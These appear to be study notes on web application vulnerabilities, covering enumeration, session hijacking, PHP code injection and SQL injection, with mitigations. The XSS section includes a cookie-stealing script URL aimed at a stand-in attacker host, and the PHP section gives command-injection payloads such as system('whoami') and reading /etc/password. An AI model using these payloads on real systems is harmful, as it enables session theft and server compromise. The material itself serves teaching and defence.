Skip to content

6. Web Applications Vulnerabilities and Countermeasures - Part 2

Introduction 1 2

  • Human error is a major point of weakness; it is the cause of 90% of cyber-attacks.
  • TSP:
    • Technical Security Provider.
    • It is a company that provides security services to other companies (clients).
    • Responsibilities:
      • Provide security services to clients.
      • Provide security training, education and guidance to clients users.
  • Any robust security training program must cover 1:
    • Phishing and social engineering.
    • Access, passwords and connection.
    • Device security.
    • Physical security.
  • Data compromise is more likely to come from an employee leaving a laptop on the train than from a malicious criminal hack 2.
  • Computers don’t create crimes. It is the people who are using the computers that commit the crimes. And people in the organizations can be—and often are—complicit. 2

User Enumeration 3 4 5 6

  • Enumeration is used to gather the following 3:
    • Usernames, group names
    • HostNames
    • Network shares and services
    • IP tables and routing tables
    • Service settings and audit configurations
    • Application and banners
    • SNMP and DNS details
  • Enumeration classification 3:
    • NetBios enumeration:
      • NetBIOS stands for Network Basic Input Output System.
      • NetBios is an API for clients to access LAN resources; developed by IBM.
      • NetBios naming: 16 ASCII characters that identify network devices over TCP/IP; 15 chars for device name, and 1 char for service type.
      • NetBios port is TCP 139.
      • Printers and file servers are examples of NetBios services.
      • Attacker can:
        • Read and write to a remote machine.
        • DOS attack on the remote machine.
        • Enumerate password policies on the remote machine.
      • Prevention:
        • Disable file and printer sharing on Windows.
        • Remove unnecessary services.
    • SNMP enumeration:
      • SNMP stands for Simple Network Management Protocol.
      • SNMP is an application-layer protocol that runs on UDP; it is used to manage network devices that run on the IP layer (routers, switches, printers, etc.).
      • SNMP ports are UDP 161 and 162.
      • Attackers can:
        • Gather information about network devices such as routers, switches, printers, etc.
        • ARP (Address Resolution Protocol) table, routing tables, and interface details.
        • Device information.
        • Traffic statistics.
      • Prevention:
        • Remove SNMP agents that are not needed.
        • Use SNMPv3, which uses encryption.
        • Use Firewalls.
        • Implement IPSec.
        • Block TCP/UDP ports 161.
    • LDAP enumeration:
      • LDAP stands for Lightweight Directory Access Protocol.
      • LDAP is an application protocol for accessing and maintaining distributed directory services like Active Directory, or OpenLDAP.
      • LDAP uses TCP and Basic Encoding Rules (BER).
      • LDAP port is TCP 389.
      • Attackers can gather sensitive information such as usernames, addresses, contact details, department details and so on.
      • Prevention:
        • Use SSL.
        • Use Kerberos to restrict access to known users.
        • Enable account lockout policies to prevent brute force attacks.
    • NTP enumeration:
      • NTP stands for Network Time Protocol.
      • NTP is used to synchronize clocks of networked computers; it is based on client-server architecture, where the agent queries the NTP server for time synchronization.
      • port is UDP 123.
      • Attackers can gather the list of hosts connected to the NTP server, their IP addresses, and the operating system they are running.
      • Prevention:
        • Use NTPSec.
        • Filter NTP traffic with specific IPTables.
        • Enable logging for messages and events.
    • SMTP enumeration:
      • SMTP stands for Simple Mail Transfer Protocol.
      • STMP is used to send and receive emails; it is based on client-server architecture.
      • SMTP port is TCP 25.
      • Prevention:
        • Ignore email responses from unknown users.
        • Disable open relay functionality.
        • Prune sensitive information from email headers, like the sender’s IP address.
    • DNS enumeration:
      • DNS stands for Domain Name System.
      • DNS is used to resolve domain names to IP addresses, and vice versa.
      • DNS’s port is UDP/TCP 53.
      • Prevention:
        • Configure DNS to prevent zone transfers to unknown hosts.
        • Ensure DNS zone transfers do not contain HINFO records.
    • Windows enumeration:
      • Enumerating what services, open files, processes, loggers, events, and users.
      • Attackers can execute or kill processes on the remote machine.
    • Unix/Linux enumeration:
      • Same as Windows enumeration.
  • User enumeration 4:
    • Login pages:
      • Login pages should return the same ambiguous error message for both invalid usernames or passwords.
      • Returning a message that says “invalid username” or “invalid password” is a bad practice as it allows attackers to enumerate valid usernames, that is, detect if a username exists in the system.
      • Do not encode usernames or login error codes in the URL.
      • HTTP response codes should be the same for both invalid usernames or passwords, in general; it should always be 200 OK; as 404 Not Found or 401 Unauthorized can be used to enumerate usernames.
      • If detecting incorrect usernames takes a different time than detecting incorrect passwords, then an attacker may be able to guess what’s wrong even if the error message is the same; thus, the server should always take the same amount of time to respond to both invalid usernames and passwords. Consider using sleep function if necessary 5.
      • The entire HTTP response (including headers and cookies) should be the same for both invalid usernames or passwords 5.
      • Implement exponential backoff to prevent brute force attacks 5.
    • Reset password pages:
      • Reset password pages should not tell if the username exists or not; it should just say that the password reset link has been sent to the email address.
      • Send an email in both cases, whether the username exists or not; if the username does not exist, send a signup email, or send a reset password email 5.
    • Signup Pages 5:
      • Avoid telling the user if the username is already taken or not.
      • Do not use sequential IDs for users.
      • If the user tries to sign up again, send a reset password email.
      • Use CAPTCHA to prevent automated attacks.

Cookies and Session Hijacking 7 8 9

  • The term “hijacking” is just another example of a “man-in-the-middle” attack attempting to gain full access to a user’s online account.
  • Session Hijacking 8:
    • It is about an attacker stealing a valid session ID and using it to impersonate a legitimate user.
    • The attacker sniffs or predicts the session ID.
    • Techniques:
      • Blind hijacking.
      • Man-in-the-middle.
      • Denial-of-service.
    • The first step is to understand how the connection is established and the characteristics of the session.
  • 31% of E-commerce applications are vulnerable to session hijacking 9.
  • Session hijacking = Cookie hijacking 9.
  • Common methods of session hijacking 9:
    • Session Fixation:
      • It is a vulnerability in the system that allows a user to get/set the session ID of another user.
      • Usually when a website accepts session IDs from a URL parameter; the attacker sends a phishing email containing a link to a website that sets a specific session ID; thus the attacker knows the session ID of the victim.
      • The attacker then uses the session ID that they set to access the victim’s account.
    • Session Sniffing:
      • The attacker uses a sniffer to capture the session ID of a user, by monitoring the network traffic between the user and the server.
      • Using SSL/TLS can prevent this attack, as it encrypts the traffic between the user and the server.
      • Public Wi-Fi networks are vulnerable to this attack, as the attacker can join the network and sniff the traffic; or create a public HotSpot and monitor users’ traffic.
    • Cross-Site Scripting XSS:
      • The attacker injects malicious code into a website, and when a user visits the website, the malicious code is executed in the user’s browser which sends the session ID to the attacker.
      • An attacker may send a phishing email to a user containing a link like: http://www.yourbankswebsite.com/search?<script>location.href=’http://www.evilattacker.com/hijacker.php?cookie=’+document.cookie;</script>
      • The above link will add and execute a script that sends all cookies to the attacker.
    • Malware:
      • The attacker designs malware that is installed on the victim’s machine, it monitors traffic and sends the session ID to the attacker.
      • It is an automated session sniffing attack.
    • Brute Force:
      • The attacker tries to guess the session ID by trying different values.
      • Either by trying common session ID generation techniques (combining the user’s IP address, user agent, etc.), or by incrementing the session ID (if it is a number).
      • The attacker may keep using old session IDs, as some websites do not invalidate old session IDs or the same session ID may be generated in the future.
  • Prevention (mitigation) of session hijacking 9:
    • Use HTTPS on the entire website.
    • Use the Secure and HttpOnly flags for cookies.
    • Use Long and complex session IDs.
    • Regenerate session IDs after a successful login.
    • Perform additional checks on the server side to verify the user’s identity:
      • Is the same IP address used in previous requests?
      • But IP addresses can be spoofed, and also it may create problems for users who use VPNs.
    • Change the cookie value after a certain amount of time (or number of requests).
    • Don’t accept session IDs from URL parameters or POST requests.
    • Only accept session IDs generated by the server.
    • Timeout inactive sessions.
    • Check the referrer header, and logout if the referrer is an external website.

Crawling, Scraping and Prefetching 10 11 12 13

  • Scraping vs Crawling 10:
    • Web crawling:
      • A crawler is also known as a spider or a bot, it is a program that browses the web in an automated manner.
      • It looks for data and more links to crawl.
    • Web scraping:
      • It is the process of extracting data from a website.
      • It is done by a web scraper, which is a program that extracts data from a website.
      • Web scraping is done by a crawler, but not all crawlers are web scrapers.
    • Usually, a crawler retrieves the HTML content and passes it to a scraper to extract the data from it.
  • Prefetching 13:
    • Prefetching is the loading of a resource before it is required to decrease the time waiting for that resource.
    • Prefetching usually uses Cache, and it can help in a web browser prefetching pages or CPU prefetching instructions.

PHP Specific Issues 14 15 16 17 18 19

  • Injecting PHP code using URL parameters, if this parameter is then rendered in the page, then we can pass ?param=<?php phpInfo(); ?> and it will be executed 14.
  • To execute commands on the echoed output 15:
    • ?param=;system("whoami");.
    • WhoAmi can be replaced with any command, like cat /etc/password.

Truncation and Trimming Attacks and SQL Injection 20 21 22 23

  • A successful SQL injection exploit can 22:
    • Read sensitive data from the database.
    • Modify database data (Insert/Update/Delete).
    • Execute administration operations on the database (such as shutdown DBMS).
    • Recover the content of a given file present on the DBMS file system.
    • Issue commands to the operating system.
  • SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces 22.
  • Types of SQL injection attacks 23:
    • In-band SQLi: uses database errors or UNION queries to extract the information.
    • Blind SQLi: the attacker can not see the result of the query, but can infer the result from other factors (such as response time).
    • Out-of-band SQLi.

References

  1. Ryerse, J. (2020, September 7). The basics of cybersecurity training for end users. ConnectWise. https://www.connectwise.com/blog/cybersecurity/the-basics-of-cybersecurity-training-for-end-users 

  2. Kelly, R. (2017, March 3). Almost 90% of cyber-attacks are caused by human error or behavior. ChiefExecutive. https://chiefexecutive.net/almost-90-cyber-attacks-caused-human-error-behavior/ 

  3. Chakravartula, R. (2021, January 22). What is enumeration? [updated 2021]. Infosec. https://resources.infosecinstitute.com/topic/what-is-enumeration/ 

  4. Lara, H. (2018, March 10). User enumeration vulnerability [Video]. YouTube. https://www.youtube.com/watch?v=IahnJVOhak4 

  5. Hacksplaining. (2018, September 30). What is user enumeration? [Video]. YouTube. https://www.youtube.com/watch?v=fP0VVzPI4jQ 

  6. Laverty, P. (2017, June 15). What Is User Enumeration? RAPID1. https://www.rapid7.com/blog/post/2017/06/15/about-user-enumeration/ 

  7. Computerphile. (2016, June 1). Cookie stealing – computerphile [Video]. YouTube. https://www.youtube.com/watch?v=T1QEs3mdJoc 

  8. Mr Code. (2021, January 10). What is session hijacking a short introduction [Video]. YouTube. https://www.youtube.com/watch?v=rqDuDSPhiCs&list=PL6jT6oPokSnIhwaEwRATkmLkVl_TX9xgF 

  9. Vojtko, M. (2020, November 16). The ultimate guide to session hijacking aka cookie hijacking. HashedOut. https://www.thesslstore.com/blog/the-ultimate-guide-to-session-hijacking-aka-cookie-hijacking/ 

  10. Oxylabs. (2019, October 10). Web crawling vs. web scraping | oxylabs [Video]. YouTube. https://www.youtube.com/watch?v=cwZF87qIF7c 

  11. Grobman, S. (2015, August 8). Spiderbot, spiderbot, does whatever a hacker thoughts. DARKReading, Informa PLC. https://www.darkreading.com/partner-perspectives/intel/spiderbot-spiderbot-does-whatever-a-hacker-thought/a/d-id/1321850 

  12. Traversy Media. (2020, January 14). Intro to web crawlers and scraping with Scrapy [Video]. YouTube. https://www.youtube.com/watch?v=ALizgnSFTwQ 

  13. Prefetching. (2020, June 30). Techopedia. https://www.techopedia.com/definition/32421/prefetching 

  14. BUG XS. (2020, April 12). PHP code injection | step-by-step guide | bug bounty [Video]. YouTube. https://www.youtube.com/watch?v=UlROTF-OspY 

  15. HackerSploit. (2019, May 13). Bug bounty hunting - PHP code injection [Video]. YouTube. https://www.youtube.com/watch?v=GE2HyC7Gwrs 

  16. The 2018 guide to building secure PHP software. (2017, December 12). Paragon initiative enterprises blog. https://paragonie.com/blog/2017/12/2018-guide-building-secure-php-software 

  17. OWASP. (n.d.). Anatomy of a WebShell - d0n quix0te [Video]. YouTube. https://www.youtube.com/watch?v=tVKucIWH0w0 

  18. OWASP Php. (n.d.). What does PHP security mean? https://owasp.org/www-project-php/migrated_content 

  19. Web application security guide/PHP-specific issues. (n.d.). Wikibooks. Retrieved June 15, 2021 from https://en.wikibooks.org/wiki/Web_Application_Security_Guide/PHP-specific_issues 

  20. Edureka! (2019, October 3). What is SQL injection? | sql injection tutorial | cybersecurity training | edureka [Video]. YouTube. https://www.youtube.com/watch?v=3Axp3VDnf0I 

  21. Henry, D. (2020, June 16). SQL injection attack explained. [2020] with SQL injection examples [Video]. YouTube. https://www.youtube.com/watch?v=VZfTmu7tn34 

  22. Kingthorin. (n.d.) SQL Injection. OWASP. Retrieved January 10 2022 from https://owasp.org/www-community/attacks/SQL_Injection 

  23. What is SQL injection (SQLi) and how to prevent it? (n.d.). Acunetix by Invicti. https://www.acunetix.com/websitesecurity/sql-injection/